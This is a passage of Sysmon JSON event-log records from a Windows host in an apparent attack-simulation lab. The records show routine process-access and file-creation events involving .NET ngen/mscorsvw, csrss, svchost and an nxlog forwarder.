C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.685","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-0010F9680F00}","TargetProcessId":"2956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8520,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.748\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-0010C96C0F00}\r\nTargetProcessId: 3124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.748","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-0010C96C0F00}","TargetProcessId":"3124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8521,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.748\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-0010C96C0F00}\r\nTargetProcessId: 3124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.748","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-0010C96C0F00}","TargetProcessId":"3124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8522,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.748\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-0010C96C0F00}\r\nTargetProcessId: 3124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.748","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-0010C96C0F00}","TargetProcessId":"3124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8523,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:19.044\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:19.044","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8524,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:19.044\r\nProcessGuid: {E2A3D6B1-137A-5F25-0000-0010C96C0F00}\r\nProcessId: 3124\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c34-0\\System.Runtime.DurableInstancing.dll\r\nCreationUtcTime: 2020-08-01 07:02:19.044","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:19.044","ProcessGuid":"{E2A3D6B1-137A-5F25-0000-0010C96C0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c34-0\\System.Runtime.DurableInstancing.dll","CreationUtcTime":"2020-08-01 07:02:19.044","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8525,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:19.076\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137B-5F25-0000-00101D720F00}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:19.076","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137B-5F25-0000-00101D720F00}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8526,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:19.076\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137B-5F25-0000-00101D720F00}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:19.076","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137B-5F25-0000-00101D720F00}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8527,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:19.091\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137B-5F25-0000-00101D720F00}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:19.091","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137B-5F25-0000-00101D720F00}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\